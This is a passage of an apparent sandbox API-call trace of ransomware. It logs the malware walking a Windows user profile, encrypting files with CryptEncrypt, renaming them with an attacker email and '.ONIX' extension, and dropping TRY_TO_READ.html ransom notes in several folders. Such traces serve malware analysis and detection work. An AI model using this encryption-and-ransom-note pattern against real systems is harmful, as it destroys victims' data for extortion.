ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0068.595] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b28 | out: hHeap=0x410000) returned 1 [0068.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.595] GetLastError () returned 0x6 [0068.595] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.595] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.595] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0068.595] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.596] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48e118 | out: pbBuffer=0x48e118) returned 1 [0068.596] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2760 | out: pbBuffer=0x4b2760) returned 1 [0068.596] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x80) returned 1 [0068.596] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 123 [0068.596] GetProcessHeap () returned 0x410000 [0068.596] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x166) returned 0x4b2c50 [0068.596] lstrcpyW (in: lpString1=0x4b2c50, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0068.596] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0068.596] GetProcessHeap () returned 0x410000 [0068.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2c50 | out: hHeap=0x410000) returned 1 [0068.596] CloseHandle (hObject=0xffffffff) returned 0 [0068.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0068.596] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0068.596] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b28 | out: hHeap=0x410000) returned 1 [0068.596] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.596] GetLastError () returned 0x6 [0068.596] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x468 [0068.597] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.597] LockFile (hFile=0x468, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x14, nNumberOfBytesToLockHigh=0x0) returned 1 [0068.597] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0068.597] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.597] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0068.597] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0068.597] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", dwFileAttributes=0x80) returned 1 [0068.597] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 41 [0068.597] GetProcessHeap () returned 0x410000 [0068.597] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc2) returned 0x43e3f8 [0068.597] lstrcpyW (in: lpString1=0x43e3f8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" [0068.597] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0068.598] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=20) returned 1 [0068.598] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x14 [0068.598] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0068.598] GetProcessHeap () returned 0x410000 [0068.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0068.598] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0068.598] WriteFile (in: hFile=0x468, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0068.602] WriteFile (in: hFile=0x468, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0068.603] WriteFile (in: hFile=0x468, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0068.604] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x46d3f8 [0068.604] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x46d418 [0068.604] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.604] ReadFile (in: hFile=0x468, lpBuffer=0x46d3f8, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46d3f8*, lpNumberOfBytesRead=0x367f44c*=0x14, lpOverlapped=0x0) returned 1 [0068.604] SetFilePointer (in: hFile=0x468, lDistanceToMove=-20, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.604] WriteFile (in: hFile=0x468, lpBuffer=0x46d418*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46d418*, lpNumberOfBytesWritten=0x367f44c*=0x14, lpOverlapped=0x0) returned 1 [0068.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46d3f8 | out: hHeap=0x410000) returned 1 [0068.605] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46d418 | out: hHeap=0x410000) returned 1 [0068.605] UnlockFile (hFile=0x468, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x14, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0068.605] CloseHandle (hObject=0x468) returned 1 [0068.607] GetProcessHeap () returned 0x410000 [0068.607] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0068.607] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0068.609] GetProcessHeap () returned 0x410000 [0068.609] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0068.609] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0068.609] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.609] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1948 | out: hHeap=0x410000) returned 1 [0068.609] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8fc27a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8fc27a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0068.609] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.609] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.609] GetLastError () returned 0x0 [0068.609] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.610] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0068.610] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.611] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.611] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.611] CloseHandle (hObject=0x468) returned 1 [0068.611] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.611] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.611] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.611] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b5e0 | out: hHeap=0x410000) returned 1 [0068.611] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0068.611] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.611] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.611] GetLastError () returned 0x0 [0068.611] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0068.612] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.613] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.613] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.614] CloseHandle (hObject=0x468) returned 1 [0068.614] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.614] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.614] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.614] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b19b0 | out: hHeap=0x410000) returned 1 [0068.614] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0068.614] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.614] GetLastError () returned 0x0 [0068.614] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.615] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.615] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.616] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.616] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.616] CloseHandle (hObject=0x468) returned 1 [0068.616] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.616] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.616] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.616] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b638 | out: hHeap=0x410000) returned 1 [0068.616] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0068.616] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.616] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.616] GetLastError () returned 0x0 [0068.616] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.617] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0068.617] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.618] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.618] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.618] CloseHandle (hObject=0x468) returned 1 [0068.618] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.618] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.618] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.618] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1a18 | out: hHeap=0x410000) returned 1 [0068.618] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0068.618] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.618] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.618] GetLastError () returned 0x0 [0068.618] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.620] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458c10 | out: hHeap=0x410000) returned 1 [0068.620] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.620] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.621] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.621] CloseHandle (hObject=0x468) returned 1 [0068.621] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.621] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.621] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.621] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b690 | out: hHeap=0x410000) returned 1 [0068.621] FindNextFileW (in: hFindFile=0x48e830, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0068.621] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.621] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.621] GetLastError () returned 0x0 [0068.621] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0068.624] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.624] WriteFile (in: hFile=0x468, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.625] WriteFile (in: hFile=0x468, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.625] WriteFile (in: hFile=0x468, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.625] CloseHandle (hObject=0x468) returned 1 